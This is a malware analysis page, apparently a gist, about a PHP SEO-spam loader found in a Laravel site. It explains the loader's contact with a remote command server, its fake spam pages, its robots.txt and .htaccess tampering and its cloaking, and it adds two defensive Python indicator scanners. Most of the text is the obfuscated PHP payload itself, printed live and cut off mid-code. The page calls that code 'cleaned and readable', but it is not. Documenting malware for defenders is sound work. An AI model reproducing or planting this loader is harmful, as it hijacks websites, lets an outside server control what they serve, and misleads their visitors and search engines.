@mrl22
Last active March 12, 2026 16:08
SEO Malware - cdn.aihack.top

SEO Malware

You likely found this page because the following obfuscated PHP code appeared somewhere inside your website after a compromise.

I encountered this exact payload inside a Laravel application where it had been written to storage/maintenance.php. Once present, it began generating large numbers of fake pages designed for search engines.

This repository/gist contains a cleaned and readable version of the code so that developers and security researchers can inspect how it works.

DO NOT RUN THIS CODE.


What this malware does

This script is part of a common class of PHP SEO spam malware. Its purpose is to hijack a legitimate website and use it to publish large numbers of search-engine-optimised pages controlled by an external attacker.

The script itself does not contain the spam content. Instead, it acts as a loader and proxy that communicates with a remote command server and displays whatever content that server instructs it to serve.


1. Connects to a remote command server

The script communicates with the following endpoint:

https://cdn.aihack.top/api/proxy/handle.php

It sends information about the infected server including:

  • request headers
  • host name
  • request URI
  • user agent
  • server environment data

This information is encoded and sent to the command server, which responds with instructions or content.

Because the content is controlled remotely, attackers can change what your site serves at any time without modifying the infected file.


2. Generates fake SEO pages

The malware dynamically generates URLs such as:

/product/<slug>-<id>.html
/category/<name>.html
/p/<id>.html
/sitemap.xml

These pages are not part of the real application.

They exist purely to host spam content for search engines, often promoting:

  • gambling sites
  • counterfeit ecommerce stores
  • pharmaceuticals
  • adult or scam websites

The goal is to abuse the authority of the compromised domain to rank these pages in search results.


3. Modifies site infrastructure

The script attempts to modify or create several files in the web root:

robots.txt
.htaccess
.rewrite_status

For example, it may inject a malicious sitemap entry into robots.txt so search engines begin crawling the fake pages automatically.

It may also attempt to create rewrite rules so the spam URLs appear legitimate.


4. Rewrites URLs and output

The malware contains logic that converts query parameters into static-looking URLs.

Example transformation:

?product=123

becomes:

/product/item-123.html

This makes the generated pages look like real site content and improves their chances of ranking in search engines.


5. Cloaks behaviour from humans

The script inspects request information such as the User-Agent header.

In many cases, these malware kits serve different content depending on whether the visitor appears to be:

  • a search engine crawler
  • a security scanner
  • a regular website visitor

This technique, known as cloaking, allows attackers to manipulate search engine indexing while avoiding detection by site owners.
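
The URL shapes from section 2, the rewrite self-test path and the `gpt=true` check in the cleaned listing all leave traces in the web server's access log. As an added example (not part of the original gist), this Python triage flags them in Combined Log Format lines; the host name, the `known_paths` parameter and the log lines are constructed assumptions.

```python
import hashlib
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# URL shapes listed in section 2 of this page.
SPAM_SHAPES = (
    re.compile(r"^/product/.+-\d+\.html$", re.I),
    re.compile(r"^/category/[^/]+\.html$", re.I),
    re.compile(r"^/p/\d+\.html$", re.I),
    re.compile(r"^/sitemap\.xml$", re.I),
)


def rewrite_probe_path(host):
    """Path the loader requests from its own host to test URL rewriting
    (rewriteWorks() in the cleaned listing): md5(host . "salt"), first 8 hex chars."""
    return "/kiro-rewrite-test-" + hashlib.md5((host + "salt").encode()).hexdigest()[:8]


def classify(line, host, known_paths=()):
    """Return (label, target) for a suspicious log line, or None.
    known_paths (assumption): paths the real application is known to serve."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path == rewrite_probe_path(host):
        return ("rewrite-probe", m["target"])
    # Same condition as the check at the top of runMalware().
    if "ChatGPT-User/1.0" in m["ua"] and parse_qs(parts.query).get("gpt") == ["true"]:
        return ("gpt-flag-check", m["target"])
    # A spam-shaped path only matters if the server actually answered it.
    if (m["status"] == "200" and parts.path not in known_paths
            and any(shape.match(parts.path) for shape in SPAM_SHAPES)):
        return ("spam-url", m["target"])
    return None


def triage(lines, host, known_paths=()):
    """Group suspicious request targets by label."""
    hits = {}
    for line in lines:
        result = classify(line, host, known_paths)
        if result:
            hits.setdefault(result[0], []).append(result[1])
    return hits


def constructed_log(host):
    """Constructed sample lines (documentation IP ranges, made-up timestamps)."""
    ts = "[12/Mar/2026:10:00:00 +0000]"
    rows = [
        ("198.51.100.4", rewrite_probe_path(host), 200, "-"),
        ("203.0.113.9", "/?gpt=true", 200, "Mozilla/5.0 (compatible; ChatGPT-User/1.0)"),
        ("203.0.113.20", "/product/item-123.html", 200, "Mozilla/5.0 (compatible; Googlebot/2.1)"),
        ("203.0.113.20", "/p/7654321.html", 404, "Mozilla/5.0 (compatible; Googlebot/2.1)"),
        ("192.0.2.15", "/sitemap.xml", 200, "Mozilla/5.0"),
        ("192.0.2.15", "/login", 200, "Mozilla/5.0"),
    ]
    return ['%s - - %s "GET %s HTTP/1.1" %d 512 "-" "%s"' % (ip, ts, path, status, ua)
            for ip, path, status, ua in rows]


if __name__ == "__main__":
    site = "shop.example.test"
    for label, targets in triage(constructed_log(site), site, {"/sitemap.xml"}).items():
        print(label, targets)
```

A site with several host names or aliases has a different probe path for each one, so run the triage once per name.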


Why this matters

If this script exists anywhere on your server, it means the system has been compromised and an attacker has gained the ability to write files to your application.

Simply deleting the file is often not enough, because the original access point may still exist.

Possible causes include:

  • vulnerable file upload endpoints
  • compromised credentials
  • outdated dependencies
  • hidden web shells
  • other infected websites on the same server

A full investigation and cleanup of the server is recommended.
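
A plain search for the C2 host name misses the obfuscated file, because every string in it is written as `\xNN` escapes. The following is an added example (not part of the original gist): a Python scan that expands those escapes before matching strings shown on this page, and reports the `.rewrite_status` and `robots.txt` artefacts from section 3. The directory layout and sample files it builds are constructed for the demonstration.

```python
import os
import re
import tempfile

# Strings visible in the sample on this page (C2 host, signature comment,
# rewrite self-test markers).
INDICATORS = ("cdn.aihack.top", "C2_SIGNATURE", "kiro-rewrite-test-", "##rewrite-ok##")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_php_hex(text):
    """Expand PHP "\\xNN" escapes so strings hidden by the obfuscator can be matched."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_php_source(source):
    """Return the indicators found in the raw or hex-decoded PHP source."""
    decoded = decode_php_hex(source)
    return sorted(i for i in INDICATORS if i in source or i in decoded)


def scan_web_root(web_root):
    """Check .rewrite_status and robots.txt. .htaccess is left for manual
    review because frameworks ship very similar rewrite rules."""
    findings = []
    status = os.path.join(web_root, ".rewrite_status")
    if os.path.isfile(status):
        findings.append((status, "state file written by the loader"))
    robots = os.path.join(web_root, "robots.txt")
    if os.path.isfile(robots):
        with open(robots, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                line = line.strip()
                if line.startswith("## AUTH:"):
                    findings.append((robots, "auth marker line: " + line))
                elif line.lower().startswith("sitemap:"):
                    findings.append((robots, "review sitemap entry: " + line))
    return findings


def scan_tree(app_root, web_root):
    """Scan every .php file under app_root, then the web-root artefacts."""
    findings = []
    for dirpath, _dirs, files in os.walk(app_root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                findings.append((path, "indicators: " + ", ".join(hits)))
    return findings + scan_web_root(web_root)


def build_constructed_tree():
    """Constructed, inert sample: one file holding the hex-escaped C2 URL,
    one clean file, and the two web-root artefacts."""
    root = tempfile.mkdtemp(prefix="seo-ioc-")
    public = os.path.join(root, "public")
    os.makedirs(os.path.join(root, "storage"))
    os.makedirs(public)
    url = "https://cdn.aihack.top/api/proxy/handle.php"
    hidden = "".join("\\x%02x" % ord(c) for c in url)
    with open(os.path.join(root, "storage", "maintenance.php"), "w") as fh:
        fh.write('<?php $u="%s";' % hidden)
    with open(os.path.join(public, "index.php"), "w") as fh:
        fh.write("<?php echo 'clean';")
    with open(os.path.join(public, ".rewrite_status"), "w") as fh:
        fh.write("disabled")
    with open(os.path.join(public, "robots.txt"), "w") as fh:
        fh.write("User-agent: *\nAllow: /\nSitemap: https://example.test/sitemap.xml\n")
    return root, public


if __name__ == "__main__":
    for path, reason in scan_tree(*build_constructed_tree()):
        print(path, "->", reason)
```

Scan the whole application tree rather than only the document root, since the file described above sat in `storage/`.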


Important warning

This code is provided for analysis and educational purposes only.

Running it on a production system would allow it to contact the attacker's command server and potentially serve malicious content through your website.

Do not execute this code.

<?php /* C2_SIGNATURE:google.us:v2 */ error_reporting(0);$ll00101o0oO=$_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"]."\x2f";$I0OolOOlO=$ll00101o0oO."\x72\x6f\x62\x6f\x74\x73\x2e\x74\x78\x74";$IIOIloO1lO=$ll00101o0oO."\x2e\x68\x74\x61\x63\x63\x65\x73\x73";$I0lolOII0oI=$ll00101o0oO."\x69\x6e\x64\x65\x78\x2e\x70\x68\x70";$I10I11101Ol1="\x23\x23\x20\x41\x55\x54\x48\x3a";$I10O0Io0lloI="";$l011lo1II=(!empty($_SERVER["\x48\x54\x54\x50\x53"])&&$_SERVER["\x48\x54\x54\x50\x53"]!=="\x6f\x66\x66")?"\x68\x74\x74\x70\x73":"\x68\x74\x74\x70";$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;if(!function_exists("\x73\x65\x6e\x64\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74")){function OI1OoIOoOIO($IIl0oO010,$loIIllo10I=5){$lolO0lIOOO="";$__O0IoIl0Ool0=0;if(function_exists("\x63\x75\x72\x6c\x5f\x65\x78\x65\x63")){$__1O0Ol0IoI1=curl_init();curl_setopt($__1O0Ol0IoI1,CURLOPT_URL,$IIl0oO010);curl_setopt($__1O0Ol0IoI1,CURLOPT_RETURNTRANSFER,true);curl_setopt($__1O0Ol0IoI1,CURLOPT_TIMEOUT,$loIIllo10I);curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYHOST,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_FOLLOWLOCATION,false);$lolO0lIOOO=curl_exec($__1O0Ol0IoI1);$__O0IoIl0Ool0=curl_getinfo($__1O0Ol0IoI1,CURLINFO_HTTP_CODE);curl_close($__1O0Ol0IoI1);}else{$IoOOoOIO1ol1=stream_context_create(array("\x68\x74\x74\x70"=>array("\x74\x69\x6d\x65\x6f\x75\x74"=>$loIIllo10I,"\x69\x67\x6e\x6f\x72\x65\x5f\x65\x72\x72\x6f\x72\x73"=>true)));$lolO0lIOOO=@file_get_contents($IIl0oO010,false,$IoOOoOIO1ol1);if(isset($OloO01OllO[0])){preg_match("\x2f\x5c\x64\x7b\x33\x7d\x2f",$OloO01OllO[0],$_OIlIIIlOoI1);$__O0IoIl0Ool0=isset($_OIlIIIlOoI1[0])?intval($_OIlIIIlOoI1[0]):0;}}return array("\x72\x65\x73\x70\x6f\x6e\x73\x65"=>$lolO0lIOOO,"\x68\x74\x74\x70\x43\x6f\x64\x65"=>$__O0IoIl0Ool0);}}if(!function_exists("\x70\x61\x72\x73\x65\x52\x65\x77\x72\x69\x74\x65\x55\x72\x6c")){function 
__OOlIlOlIlIO(){$l0I0OOlOolO=isset($_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"])?$_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"]:"";$OoOo11Io00I=parse_url($l0I0OOlOolO,PHP_URL_PATH);if($OoOo11Io00I==="\x2f"||$OoOo11Io00I==="\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70"){return;}if(preg_match("\x2f\x5e\x5c\x2f\x73\x69\x74\x65\x6d\x61\x70\x5c\x2e\x78\x6d\x6c\x24\x2f\x69",$OoOo11Io00I)){$_GET["\x73\x69\x74\x65\x6d\x61\x70"]="\x31";$_GET["\x74\x79\x70\x65"]="\x69\x6e\x64\x65\x78";$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x74\x79\x70\x65\x3d\x69\x6e\x64\x65\x78";return;}if(preg_match("\x2f\x5e\x5c\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d\x28\x5c\x64\x2b\x29\x5c\x2e\x78\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x73\x69\x74\x65\x6d\x61\x70"]="\x31";$_GET["\x70\x61\x67\x65"]=$_OIlIIIlOoI1[1];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x70\x61\x67\x65\x3d".$_OIlIIIlOoI1[1];return;}if(preg_match("\x2f\x5e\x5c\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d\x28\x5c\x77\x2b\x29\x2d\x28\x5c\x64\x2b\x29\x5c\x2e\x78\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x73\x69\x74\x65\x6d\x61\x70"]="\x31";$_GET["\x74\x79\x70\x65"]=$_OIlIIIlOoI1[1];$_GET["\x70\x61\x67\x65"]=$_OIlIIIlOoI1[2];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x74\x79\x70\x65\x3d".$_OIlIIIlOoI1[1]."\x26\x70\x61\x67\x65\x3d".$_OIlIIIlOoI1[2];return;}if(preg_match("\x2f\x5e\x5c\x2f\x70\x72\x6f\x64\x75\x63\x74\x5c\x2f\x28\x2e\x2b\x29\x2d\x28\x5c\x64\x2b\x29\x5c\x2e\x68\x74\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x73\x6c\x75\x67"]=$_OIlIIIlOoI1[1];$_GET["\x70\x69\x64"]=$_OIlIIIlOoI1[2];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x6c\x75\x67\x3d".urlencode($_OIlIIIlOoI1[1])."\x26\x70\x69\x64\x3d".$_OIlIIIlOoI1[2];return;}if(preg_match("\x2f\x5e\x5c\x2f\x70\x5c\x2f\x28\x5c\x64\x
2b\x29\x5c\x2e\x68\x74\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x70"]=$_OIlIIIlOoI1[1];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x70\x3d".$_OIlIIIlOoI1[1];return;}if(preg_match("\x2f\x5e\x5c\x2f\x63\x61\x74\x65\x67\x6f\x72\x79\x5c\x2f\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x5c\x2e\x68\x74\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x63\x61\x74\x65\x67\x6f\x72\x79"]=$_OIlIIIlOoI1[1];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x63\x61\x74\x65\x67\x6f\x72\x79\x3d".urlencode($_OIlIIIlOoI1[1]);return;}}}if(!function_exists("\x64\x65\x74\x65\x63\x74\x53\x65\x72\x76\x65\x72\x54\x79\x70\x65")){function __loOl1Il0OlI(){$OIll1ollOll0=isset($_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"])?strtolower($_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"]):"";if(strpos($OIll1ollOll0,"\x61\x70\x61\x63\x68\x65")!==false){return"\x61\x70\x61\x63\x68\x65";}if(strpos($OIll1ollOll0,"\x6e\x67\x69\x6e\x78")!==false){return"\x6e\x67\x69\x6e\x78";}$I1OOII1Io0=php_sapi_name();if(strpos($I1OOII1Io0,"\x61\x70\x61\x63\x68\x65")!==false){return"\x61\x70\x61\x63\x68\x65";}if($I1OOII1Io0==="\x66\x70\x6d\x2d\x66\x63\x67\x69"||$I1OOII1Io0==="\x63\x67\x69\x2d\x66\x63\x67\x69"){return"\x6e\x67\x69\x6e\x78";}return"\x75\x6e\x6b\x6e\x6f\x77\x6e";}}if(!function_exists("\x63\x68\x65\x63\x6b\x52\x65\x77\x72\x69\x74\x65\x45\x6e\x61\x62\x6c\x65\x64")){function _oolO0O001lo(){global 
$l011lo1II;$lIoOoooIooII=isset($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]:"";$IIoO00o10I="\x2f\x6b\x69\x72\x6f\x2d\x72\x65\x77\x72\x69\x74\x65\x2d\x74\x65\x73\x74\x2d".substr(md5($lIoOoooIooII."\x73\x61\x6c\x74"),0,8);$l0I0OOlOolO=isset($_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"])?$_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"]:"";if(strpos($l0I0OOlOolO,"\x6b\x69\x72\x6f\x2d\x72\x65\x77\x72\x69\x74\x65\x2d\x74\x65\x73\x74\x2d")!==false){exit("\x23\x23\x72\x65\x77\x72\x69\x74\x65\x2d\x6f\x6b\x23\x23");}$IlOOIoOo1=$l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII.$IIoO00o10I;$Io01lOOo00=OI1OoIOoOIO($IlOOIoOo1,5);return strpos($Io01lOOo00["\x72\x65\x73\x70\x6f\x6e\x73\x65"],"\x23\x23\x72\x65\x77\x72\x69\x74\x65\x2d\x6f\x6b\x23\x23")!==false;}}if(!function_exists("\x65\x6e\x73\x75\x72\x65\x48\x74\x61\x63\x63\x65\x73\x73\x53\x61\x66\x65")){function _IlOl11lOo1O(){global $IIOIloO1lO,$l011lo1II;$lIoOoooIooII=isset($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]:"";$OIlOOOIOol="\x3c\x49\x66\x4d\x6f\x64\x75\x6c\x65\x20\x6d\x6f\x64\x5f\x72\x65\x77\x72\x69\x74\x65\x2e\x63\x3e\x0a\x52\x65\x77\x72\x69\x74\x65\x45\x6e\x67\x69\x6e\x65\x20\x4f\x6e\x0a\x52\x65\x77\x72\x69\x74\x65\x42\x61\x73\x65\x20\x2f\x0a\x0a\x23\x20\x9759\x6001\x6587\x4ef6\x76f4\x63a5\x8bbf\x95ee\x0a\x52\x65\x77\x72\x69\x74\x65\x43\x6f\x6e\x64\x20\x25\x7b\x52\x45\x51\x55\x45\x53\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45\x7d\x20\x2d\x66\x20\x5b\x4f\x52\x5d\x0a\x52\x65\x77\x72\x69\x74\x65\x43\x6f\x6e\x64\x20\x25\x7b\x52\x45\x51\x55\x45\x53\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45\x7d\x20\x2d\x64\x0a\x52\x65\x77\x72\x69\x74\x65\x52\x75\x6c\x65\x20\x5e\x20\x2d\x20\x5b\x4c\x5d\x0a\x0a\x23\x20\x6240\x6709\x5176\x4ed6\x8bf7\x6c42\x8f6c\x53d1\x5230\x20\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x0a\x52\x65\x77\x72\x69\x74\x65\x52\x75\x6c\x65\x20\x5e\x28\x2e\x2a\x29\x24\x20\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x20\x
5b\x4c\x2c\x51\x53\x41\x5d\x0a\x3c\x2f\x49\x66\x4d\x6f\x64\x75\x6c\x65\x3e\x0a";$_ll0oIol1o1=null;$__1l0l0oI10o=file_exists($IIOIloO1lO);if($__1l0l0oI10o){$_ll0oIol1o1=@file_get_contents($IIOIloO1lO);if(strpos($_ll0oIol1o1,"\x52\x65\x77\x72\x69\x74\x65\x45\x6e\x67\x69\x6e\x65")!==false){return"\x65\x78\x69\x73\x74\x73";}$OOIOoI00I=$_ll0oIol1o1."\n".$OIlOOOIOol;}else{$OOIOoI00I=$OIlOOOIOol;}$Ioll0000o1o=@file_put_contents($IIOIloO1lO,$OOIOoI00I);if($Ioll0000o1o===false){return"\x77\x72\x69\x74\x65\x5f\x66\x61\x69\x6c\x65\x64";}$IlOOIoOo1=$l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII."\x2f\x3f\x5f\x68\x74\x61\x63\x63\x65\x73\x73\x5f\x74\x65\x73\x74\x3d\x31";$Io01lOOo00=OI1OoIOoOIO($IlOOIoOo1,5);if($Io01lOOo00["\x68\x74\x74\x70\x43\x6f\x64\x65"]>=500||$Io01lOOo00["\x68\x74\x74\x70\x43\x6f\x64\x65"]===0){if($__1l0l0oI10o&&$_ll0oIol1o1!==null){@file_put_contents($IIOIloO1lO,$_ll0oIol1o1);}else{@unlink($IIOIloO1lO);}return"\x72\x6f\x6c\x6c\x62\x61\x63\x6b";}if(_oolO0O001lo()){return"\x63\x72\x65\x61\x74\x65\x64";}else{return"\x63\x72\x65\x61\x74\x65\x64\x5f\x62\x75\x74\x5f\x6e\x6f\x74\x5f\x77\x6f\x72\x6b\x69\x6e\x67";}}}if(!function_exists("\x72\x65\x77\x72\x69\x74\x65\x55\x72\x6c\x73\x49\x6e\x43\x6f\x6e\x74\x65\x6e\x74")){function OIlOo0O00110($_II1loIO1IoO,$_OIloO1oI=false){if(!$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]&&!$_OIloO1oI){return 
$_II1loIO1IoO;}$_II1loIO1IoO=preg_replace("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x74\x79\x70\x65\x3d\x69\x6e\x64\x65\x78\x2f","\x2f\x73\x69\x74\x65\x6d\x61\x70\x2e\x78\x6d\x6c",$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x64\x6f\x6d\x61\x69\x6e\x3d\x5b\x5e\x26\x5d\x2b\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x71\x3d\x5b\x5e\x26\x5d\x2b\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x6c\x69\x6d\x69\x74\x3d\x5c\x64\x2b\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x61\x67\x65\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d".$I10I11101Ol1[1]."\x2e\x78\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x74\x79\x70\x65\x3d\x28\x5c\x77\x2b\x29\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x61\x67\x65\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d".$I10I11101Ol1[1]."\x2d".$I10I11101Ol1[2]."\x2e\x78\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x6c\x75\x67\x3d\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x69\x64\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x70\x72\x6f\x64\x75\x63\x74\x2f".$I10I11101Ol1[1]."\x2d".$I10I11101Ol1[2]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x69\x69\x64\x3d\x70\x72\x6f\x64\x75\x63\x74\x5c\x2f\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x69\x64\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x70\x72\x6f\x64\x75\x63\x74\x2f".$I10I11101Ol1[1]."\x2d".$I10I11101Ol1[2]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("
\x2f\x5c\x2f\x3f\x5c\x3f\x28\x3f\x3a\x63\x63\x7c\x69\x69\x64\x7c\x70\x69\x64\x7c\x70\x72\x6f\x64\x75\x63\x74\x7c\x69\x74\x65\x6d\x7c\x67\x6f\x6f\x64\x73\x7c\x70\x7c\x63\x7c\x70\x72\x6f\x64\x75\x63\x74\x5f\x69\x64\x7c\x67\x6f\x6f\x64\x69\x64\x7c\x67\x6f\x6f\x64\x5f\x69\x64\x7c\x69\x64\x7c\x73\x6b\x75\x7c\x72\x65\x66\x7c\x70\x72\x6f\x64\x7c\x67\x69\x64\x7c\x64\x7c\x67\x6f\x6f\x64\x73\x5f\x69\x64\x29\x3d\x28\x5c\x64\x7b\x37\x2c\x7d\x29\x28\x3f\x3d\x5b\x22\x5c\x73\x3c\x26\x27\x5d\x7c\x24\x29\x2f",function($I10I11101Ol1){return"\x2f\x70\x2f".$I10I11101Ol1[1]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x63\x61\x74\x65\x67\x6f\x72\x79\x3d\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x63\x61\x74\x65\x67\x6f\x72\x79\x2f".$I10I11101Ol1[1]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);return $_II1loIO1IoO;}}if(!function_exists("\x67\x65\x74\x53\x69\x74\x65\x6d\x61\x70\x55\x72\x6c")){function _1OlOI0OI1O(){global $l011lo1II;$lIoOoooIooII=isset($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]:"";if($GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]){return $l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII."\x2f\x73\x69\x74\x65\x6d\x61\x70\x2e\x78\x6d\x6c";}else{return $l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII."\x2f\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x74\x79\x70\x65\x3d\x69\x6e\x64\x65\x78";}}}if(!function_exists("\x69\x6e\x69\x74\x52\x65\x77\x72\x69\x74\x65\x43\x68\x65\x63\x6b")){function lIo0ll11ol(){global 
$ll00101o0oO;$__Io1Io1OoIIl=$ll00101o0oO."\x2e\x72\x65\x77\x72\x69\x74\x65\x5f\x73\x74\x61\x74\x75\x73";if(file_exists($__Io1Io1OoIIl)){$__l0000l1lI11=trim(@file_get_contents($__Io1Io1OoIIl));if($__l0000l1lI11==="\x65\x6e\x61\x62\x6c\x65\x64"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=true;return;}elseif($__l0000l1lI11==="\x64\x69\x73\x61\x62\x6c\x65\x64"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;return;}}$_O1llOo00OI=__loOl1Il0OlI();$I0ooOO1OlO1=_oolO0O001lo();if($I0ooOO1OlO1){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=true;@file_put_contents($__Io1Io1OoIIl,"\x65\x6e\x61\x62\x6c\x65\x64");return;}if($_O1llOo00OI==="\x61\x70\x61\x63\x68\x65"){$Io01lOOo00=_IlOl11lOo1O();if($Io01lOOo00==="\x63\x72\x65\x61\x74\x65\x64"||$Io01lOOo00==="\x65\x78\x69\x73\x74\x73"){if(_oolO0O001lo()){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=true;@file_put_contents($__Io1Io1OoIIl,"\x65\x6e\x61\x62\x6c\x65\x64");}else{$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}}elseif($Io01lOOo00==="\x72\x6f\x6c\x6c\x62\x61\x63\x6b"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}else{$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}}elseif($_O1llOo00OI==="\x6e\x67\x69\x6e\x78"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x